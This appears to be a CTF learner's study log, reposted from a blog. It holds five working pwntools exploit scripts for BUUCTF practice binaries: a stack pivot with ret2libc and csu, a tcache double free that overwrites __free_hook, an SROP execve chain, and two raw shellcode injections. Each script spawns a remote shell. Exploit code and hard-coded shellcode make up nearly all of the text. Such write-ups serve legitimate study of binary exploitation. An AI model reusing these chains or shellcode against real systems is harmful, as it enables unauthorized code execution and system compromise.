
21.07.28学习总结

Column: July 28, 2021
Tags: learning experience

11:00-12:00: buu刷题: ciscn_2019_final_3我写的不好, 写成要爆破的了

14:25-16:30: buu刷题: ciscn_2019_es_7: 和ciscn_2019_s_3一模一样

ciscn_2019_s_9: 写一段汇编就好了

picoctf_2018_shellcode: ret2shellcode, 我傻逼了

actf_2019_babystack: 栈迁移和ret2libc+csu, 稍微复杂点的常规题

后面一直在玩, 我忏悔

actf_2019_babystack

#!/usr/bin/env python
# coding=utf-8
from pwn import *
# Target: a remote instance on the BUUCTF practice platform; the local
# process line is kept commented out for offline debugging.
#sh=process('./ACTF_2019_babystack')
sh=remote('node4.buuoj.cn',28442)
elf=ELF('./ACTF_2019_babystack')
#context.log_level='debug'
context.binary=elf
# NOTE(review): absolute path into one machine's glibc-all-in-one checkout;
# the script only runs elsewhere if this is adjusted (or the commented
# elf.libc line is used with the local process). The puts/system/"/bin/sh"
# offsets used below all come from this file.
libc=ELF('/home/thu1e/ctf/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
#libc=elf.libc

# Fixed addresses inside the target binary (0x40xxxx values, so presumably a
# non-PIE build). csu_1/csu_2 are the two entry points of the "csu" chain the
# summary above mentions, leave_ret drives the stack pivot ("栈迁移"), ret is
# used as a sled. pop_rsi_r15 is defined but not used anywhere below.
leave_ret=0x0400a18
pop_rdi=0x0400ad3
pop_rsi_r15=0x0400ad1
csu_2=0x0400AC6
csu_1=0x0400AB0
ret=0x0400709

#gdb.attach(sh, '''b *0x400ad3''')
# Stage 1: answer the length prompt with 0xe0 and parse the hex address the
# program prints after "at " (the buffer the input is read into).
sh.recv()
sh.sendline(str(0xe0))
sh.recvuntil('at ')
read_in_addr=int(sh.recvuntil('\n').split('\n')[0], 16)
log.success('read in addr: '+hex(read_in_addr))
# Chain placed at the start of the 0xe0-byte input:
#   1. pop rdi; puts@got -> puts@plt : prints the libc address of puts (leak);
#   2. csu_2 ... csu_1 : the qwords between them are whatever the gadget at
#      0x400AC6 pops (read@got, 0x100 and read_in_addr+0x60 among them) so
#      that csu_1 ends up calling read() to receive payload2 into the buffer.
#      Which qword lands in which register depends on the exact gadget --
#      verify against the binary before reusing this layout.
payload=p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])\
        +p64(csu_2)+p64(0)+p64(0)+p64(1)+p64(elf.got['read'])+p64(0x100)\
        +p64(read_in_addr+0x60)+p64(0)+p64(csu_1)

# Pad to 0xd0; the final 16 bytes (presumably saved rbp and the return
# address) become read_in_addr-8 and leave_ret, so `leave; ret` moves rsp into
# the buffer and the chain above runs -- the stack pivot.
payload+=p8(0)*(0xd0-len(payload))+p64(read_in_addr-8)+p64(leave_ret)

sh.recv()
sh.send(payload)
# The leaked puts address follows the program's "Byebye~" line: 6 raw bytes,
# zero-extended to a qword. Python 2 only -- the str pad here, the str+bytes
# concatenation in payload2 and .next() below all fail under Python 3.
sh.recvuntil('Byebye~\n')
leak_addr=u64(sh.recv(6).ljust(8, '\x00'))
libc_base=leak_addr-libc.sym['puts']
log.success('libc base: '+hex(libc_base))
sys_addr=libc_base+libc.sym['system']
bin_sh_addr=libc_base+libc.search('/bin/sh').next()
# payload2 is what the csu read() call receives (12 qwords after the chain,
# i.e. at read_in_addr+0x60): a sled of 12 `ret`s, then system("/bin/sh").
# The sled presumably absorbs the qwords popped after the csu call returns;
# the trailing 8 bytes are filler.
payload2=p64(ret)*12+p64(pop_rdi)+p64(bin_sh_addr)+p64(sys_addr)+'wwwwwwww'
sh.send(payload2)
sh.interactive()

ciscn_2019_final_3

#!/usr/bin/env python
# coding=utf-8
from pwn import *
# Target: remote BUUCTF instance; local process line kept for debugging.
#sh=process('./ciscn_final_3')
sh=remote('node4.buuoj.cn',29129)
elf=ELF('./ciscn_final_3')
# libc shipped with the challenge; the __free_hook and system offsets used
# below are taken from it.
libc=ELF("./libc/libc.so.6")
context.binary=elf
#context.log_level='debug'

def add(idx, size, content='/bin/sh\x00'):
    """Drive menu option 1: send idx and size as lines, then the raw content.

    Pending output is drained first; content is sent without a trailing
    newline, so the caller controls every byte that lands in the chunk.
    """
    sh.recv()
    for line in ('1', str(idx), str(size)):
        sh.sendline(line)
    sh.send(content)

def remove(idx):
    """Drive menu option 2 for slot idx, draining output before each line sent."""
    for line in ('2', str(idx)):
        sh.recv()
        sh.sendline(line)

# Heap-address leak: the program prints a "gift :" line after the first
# allocation; 0xe70 is the distance from that value back to the heap base
# (offset taken from the binary, not derivable from this script).
add(0, 0x78)
sh.recvuntil('gift :')
heap_addr=int(sh.recvuntil('\n').split('\n')[0], 16)-0xe70
log.success('heap_addr: '+hex(heap_addr))

# Fill: four 0x18 chunks in slots 1-4, nine 0x78 chunks in slots 5-13.
for i in range(4):
    add(i+1, 0x18)

for i in range(9):
    add(i+5, 0x78)

# Slot 0 is freed twice; the next two same-size allocations carry the chosen
# pointer, so the third one (slot 16) presumably lands at heap_addr+0xe70+0x40,
# where payload2 writes seven zero qwords and a 0x481 size field.
remove(0)
remove(0)
payload1=p64(heap_addr+0xe70+0x40)
add(14, 0x78, payload1)
add(15, 0x78, payload1)
payload2=p64(0)*7+p64(0x481)
add(16, 0x78, payload2)
remove(1) # author's note: this free goes to the unsorted bin
remove(3) # author's note: 0x20 tcache entry
add(17, 0x38)
# 2-byte partial overwrite: the low 12 bits of __free_hook are known from the
# libc file, the next nibble is fixed at 0xf -- a guess, which is why the
# summary above says this version needs retries ("要爆破").
payload3=p16(((libc.sym['__free_hook'])&0xfff)+0xf000)
add(18, 0x38, payload3)
add(19, 0x18)
add(20, 0x18, p64(0))
# The next "gift :" line is taken as the full __free_hook address, giving
# the libc base.
sh.recvuntil('gift :')
free_hook_addr=int(sh.recvuntil('\n').split('\n')[0], 16)
libc_base=free_hook_addr-libc.sym['__free_hook']
log.success('libc_base: '+hex(libc_base))
# Second double free (slot 21) so that a 0x28 allocation is served at
# free_hook_addr; slot 24 writes system there. Slot 23 holds add()'s default
# content ("/bin/sh"), so freeing it is what hands that string to the hook.
add(21, 0x28)
remove(21)
remove(21)
add(22, 0x28, p64(free_hook_addr))
add(23, 0x28)
add(24, 0x28, p64(libc_base+libc.sym['system']))
remove(23)
sh.interactive()

ciscn_2019_es_7

#!/usr/bin/env python
# coding=utf-8
from pwn import *
# Target: remote BUUCTF instance; local process line kept for debugging.
#sh=process('./ciscn_2019_es_7')
sh=remote('node4.buuoj.cn',25041)
elf=ELF('./ciscn_2019_es_7')
context.binary=elf
# Blocks for a keypress before the first send (useful for attaching gdb).
pause()
# Stage 1: 0x10 bytes of filler, then main's address twice (return to main
# after the overflow). 0x20 bytes of the reply are skipped and the next 6
# bytes are read as a leaked stack address (str pad: Python 2 only).
payload1='a'*0x10+p64(elf.sym['main'])+p64(elf.sym['main'])
sh.send(payload1)
sh.recv(0x20)
leak_stack=u64(sh.recv(6).ljust(8, '\x00'))
sh.recv()
log.success('leak_stack: '+hex(leak_stack))
# 0x138 below the leaked value is where the input buffer sits; the offset is
# from the binary (the summary says this matches ciscn_2019_s_3 exactly).
read_addr=leak_stack-0x138

# Sigreturn frame: resume at 0x400517 with rax=59 (execve on x86-64) and rdi
# pointing at read_addr+8, i.e. the second "/bin/sh" copy at the start of
# payload2; rdx/rcx zeroed.
frame=SigreturnFrame()
frame.rip=0x400517
frame.rax=59
frame.rdi=read_addr+8
frame.rdx=0
frame.rcx=0
# 0x4004DA and 0x400517 are gadgets in the binary (presumably the ones that
# set up and issue the sigreturn syscall -- verify). str(frame) is the
# Python 2 spelling; Python 3 pwntools needs bytes(frame).
payload2='/bin/sh\x00'*2+p64(0x04004DA)+p64(0x400517)+str(frame)
sh.send(payload2)
sh.interactive()

ciscn_2019_s_9

#!/usr/bin/env python
# coding=utf-8
from pwn import *
# Target: remote BUUCTF instance; local process line kept for debugging.
#sh=process('./ciscn_s_9')
sh=remote('node4.buuoj.cn',25983)
elf=ELF('./ciscn_s_9')
context.binary=elf
# Debug logging on: every byte sent/received is printed.
context.log_level='debug'

# shellcode1: 21 hard-coded bytes ending in int 0x80 (32-bit). The same
# bytes are used again in the picoctf_2018_shellcode script below.
shellcode1='\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
# shellcode2 is assembled for context.binary's architecture: 0x28 = 36 + 4 is
# exactly the distance from the stub back to the start of shellcode1 in the
# payload layout below, so `jmp esp` lands on shellcode1.
shellcode2='''
    sub esp, 0x28;
    jmp esp;
'''
shellcode2=asm(shellcode2)
# Layout: shellcode1 zero-padded to 9*4 = 36 bytes, the saved return address
# replaced by 0x8048554 (presumably a gadget in the binary that transfers
# control to the bytes that follow -- verify), then shellcode2.
payload=shellcode1+p8(0)*(9*4-len(shellcode1))+p32(0x8048554)+shellcode2
#gdb.attach(sh)
sh.recv()
sh.sendline(payload)
sh.interactive()

picoctf_2018_shellcode

#!/usr/bin/env python
# coding=utf-8
from pwn import *
# Target: remote BUUCTF instance; local process line kept for debugging.
#sh=process('./PicoCTF_2018_shellcode')
sh=remote('node4.buuoj.cn',29938)
elf=ELF('./PicoCTF_2018_shellcode')
context.binary=elf
# Debug logging on: every byte sent/received is printed.
context.log_level='debug'

# Same 21 hard-coded bytes as shellcode1 in the ciscn_2019_s_9 script above.
# Per the summary this challenge is plain "ret2shellcode", so the payload is
# the shellcode alone, sent with a trailing newline.
shellcode2='\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
payload=shellcode2
sh.recv()
sh.sendline(payload)
sh.interactive()


转载自blog.csdn.net/eeeeeight/article/details/119194139